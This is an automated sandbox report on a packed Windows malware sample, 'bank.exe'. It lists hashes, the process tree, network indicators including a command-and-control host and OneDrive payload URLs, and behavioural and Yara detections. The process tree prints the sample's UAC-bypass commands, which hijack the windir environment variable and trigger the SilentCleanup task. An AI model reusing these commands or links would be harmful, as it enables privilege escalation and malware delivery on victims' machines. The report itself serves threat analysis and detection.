Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 10, 2021, 5:42 p.m.	Aug. 10, 2021, 5:51 p.m.

Size	703.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`e92cb564767afb2d59b12ecfc97ed86a`
SHA256	`dcfbcb0018eb4a0bcca81d7990bde125541b7c9de20c16142ba46140261a0b0d`
CRC32	`AED14873`
ssdeep	`12288:SnE1eDMrSuUFA+/ARNb43cRuM7bUwYgsI4pR8/CH3eVgfm+7p:42HfUG+oRNb43chyXI4pR0U3eY`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

bank.exe "C:\Users\test22\AppData\Local\Temp\bank.exe"
2776
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  3648
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    3716
    - reg.exe reg delete hkcu\Environment /v windir /f
      3800
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      3844
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      3888
- cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
  4020
  - reg.exe reg delete hkcu\Environment /v windir /f
    4080

Name	Response	Post-Analysis Lookup
twistednerd.dvrlists.com	A 62.102.148.130	62.102.148.130
apv5oq.sn.files.1drv.com	CNAME odc-sn-files-geo.onedrive.akadns.net CNAME sn-files.fe.1drv.com CNAME sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net A 13.107.42.12 CNAME odc-sn-files-brs.onedrive.akadns.net CNAME l-0003.l-msedge.net	13.107.42.12
onedrive.live.com	CNAME odc-web-geo.onedrive.akadns.net CNAME l-0004.l-msedge.net A 13.107.42.13 CNAME odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net CNAME odc-web-brs.onedrive.akadns.net	13.107.42.13

IP Address	Status	Action
13.107.42.12	Active	Moloch
13.107.42.13	Active	Moloch
164.124.101.2	Active	Moloch
62.102.148.130	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49201 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49200 -> 13.107.42.13:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49201 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLSv1 192.168.56.101:49200 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=onedrive.com	24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de
TLSv1 192.168.56.101:49202 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLS 1.3 192.168.56.101:49213 62.102.148.130:8618	None	None	None
TLS 1.3 192.168.56.101:49204 62.102.148.130:8618	None	None	None
TLS 1.3 192.168.56.101:49212 62.102.148.130:8618	None	None	None

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 10, 2021, 5:42 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 5:42 p.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 5:43 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:43 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:43 p.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 5:43 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.itext

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (3 events)

request	GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ
request	GET https://apv5oq.sn.files.1drv.com/y4mqtDxi_yjQqMj7aLneNR5K2ag2n6a9B3s2vsguKxD6cq_pEbf-AoBavtlpqHoxXjnVTTRodHYAyAVwV2qMV3yT9FJF0ReIQscZaXQGrtQ_Qo0ZTxor0a01qx5w-nMorDgI-I4bWaoFPlMR2GfVgFSbCIl6ErQU5_nxjDMV0u2rSp5S7Vf6y3eFgoL5jbcc9J171z-sNGiboKZE27hENWiuQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1
request	GET https://apv5oq.sn.files.1drv.com/y4muXeUmSOr2eA8OAZv22ApcwBCduBInlnDD_iP2ohqHowwtZcujQFarcs7juK_0mSRbt6MJSbKteWevTHBIgiv6lJwPrMTfvY1ZebPr11dv0Jj63I1RU3a9kMWmQKSmYqgZFh1LLe2fAR8EZ-z8j-pWLadKuq6Z3fIVgXk84emHccp7oVXqMPta0w5zmX9fkWNqjQ12SMYb696eSzEeW3MLQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73702000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 2776 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\Public\KDECO.bat
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\Libraries\Yjjdwkj\Yjjdwkj.exe
file	C:\Users\Public\Trast.bat
file	C:\Users\Public\nest.bat

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 81920 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x020c1000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (50 out of 60 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg delete hkcu\Environment /v windir /f
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: fae0faf0b5a7d6ee91ec95cdb4edd553727fb2ed

Allocates execute permission to another process indicative of possible code injection (50 out of 1103 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00290000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00300000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00310000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00320000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00340000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00360000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00380000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00390000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00420000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00430000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00440000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00450000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00490000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00500000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00510000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00550000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1
